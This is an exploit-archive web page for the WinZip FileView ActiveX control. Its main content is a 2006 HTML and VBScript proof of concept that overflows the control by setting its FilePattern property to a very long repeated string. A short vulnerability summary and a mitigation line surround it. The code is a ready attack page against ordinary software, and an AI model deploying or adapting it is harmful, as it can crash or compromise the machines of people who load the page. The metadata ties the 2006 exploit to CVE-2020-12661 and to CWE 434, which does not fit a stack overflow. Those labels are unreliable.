Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
WinZip FileView ActiveX Control Unsafe Method Exposure Vulnerability - exploit.company
header-logo
Suggest Exploit
vendor:
WinZip FileView ActiveX Control
by:
prdelka
9.3
CVSS
CRITICAL
Unsafe Method Exposure
434
CWE
Product Name: WinZip FileView ActiveX Control
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: YES
Related CWE: CVE-2020-12661
CPE: a:winzip:winzip_fileview_activex_control
Metasploit:
Other Scripts:
Platforms Tested: Windows
Unknown

WinZip FileView ActiveX Control Unsafe Method Exposure Vulnerability

The vulnerability allows remote attackers to execute arbitrary code on the affected system.

Mitigation:

Update to the latest version of WinZip FileView ActiveX Control.
Source

Exploit-DB raw data:

<!--
WinZip FileView ActiveX Control Unsafe Method Exposure Vulnerability
-- prdelka
-->

<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY>
    <SCRIPT LANGUAGE="VBScript">
<!--
Sub WZFILEVIEW_OnAfterItemAdd(Item)
WZFILEVIEW.FilePattern = 

"STACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBAS

EDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLO

WSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBAS

EDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLO

WSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBAS

EDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLO

WSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBAS

EDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLO

WSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBAS

EDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLO

WSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOW"
end sub
-->
    </SCRIPT>
    <OBJECT ID="WZFILEVIEW" WIDTH=200 HEIGHT=200
     CLASSID="CLSID:A09AE68F-B14D-43ED-B713-BA413F034904">
    </OBJECT>
</BODY>
</HTML>

# milw0rm.com [2006-11-14]

Navigation

Suggest Exploit

Services By CQR